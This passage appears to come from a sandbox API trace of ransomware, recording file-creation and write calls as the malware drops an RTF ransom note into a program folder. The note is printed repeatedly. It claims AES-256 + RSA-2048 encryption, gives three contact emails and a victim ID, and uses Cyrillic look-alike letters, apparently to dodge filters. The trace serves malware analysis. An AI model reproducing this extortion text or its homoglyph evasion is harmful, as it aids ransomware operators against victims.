w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.527] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.528] CloseHandle (hObject=0x1fc) returned 1 [0064.528] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\bg85_info.rtf")) returned 0xffffffff [0064.528] GetLastError () returned 0x2 [0064.528] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t 